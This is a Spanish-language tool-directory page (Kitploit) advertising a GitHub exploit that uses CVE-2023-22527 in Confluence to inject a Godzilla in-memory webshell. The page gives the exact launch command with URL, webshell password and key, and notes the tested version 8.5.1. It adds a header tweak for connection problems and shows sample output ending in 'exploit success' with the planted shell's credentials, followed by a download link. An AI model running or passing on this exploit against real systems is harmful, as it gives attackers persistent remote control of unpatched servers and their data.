Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-22527-Godzilla-MEMSHELL — CVE-2023-22527 herramienta de inyección de webshell en memoria | Kitploit
Herramientas/GitHubGitHub/boogipop/cve-2023-22527-godzilla-memshell
ExplotaciónShellcodeExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubboogipop/cve-2023-22527-godzilla-memshell

CVE-2023-22527-Godzilla-MEMSHELL

CVE-2023-22527 herramienta de inyección de webshell en memoria

Ver Repositorio
76102hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-22527-Godzilla-MEMSHELL

Uso

Nota: la versión probada es 8.5.1, otras versiones definitivamente también funcionan, pero no se probaron.

root@kitploit:~
Contenido referenciado de la herramienta anterior del maestro Beichen.

java -jar CVE-2023-22527-Godzilla-MEMSHELL-main.jar url contraseña de Godzilla clave de Godzilla

ejemplo
        java -jar CVE-2023-22527-Godzilla-MEMSHELL-main.jar http://xxxx/  pass key

Si el shell de memoria se ha inyectado con éxito pero Godzilla no puede conectarse, agregue el siguiente encabezado en la configuración de la solicitud o configure el proxy de Burp para Godzilla.

root@kitploit:~
Connection: close
root@kitploit:~

$ java -jar .\CVE-2023-22527-Godzilla-MEMSHELL-main.jar http://127.0.0.1:8090/ qaxnb key
[*] Exploit url: http://127.0.0.1:8090/template/aui/text-inline.vm
Response Code: 200
Response Code: 200
[*] send payload
Validate Response Code: 200
[*] exploit success
[*] godzilla webshell password : qaxnb
[*] godzilla webshell key : key

img.png

Descargar herramienta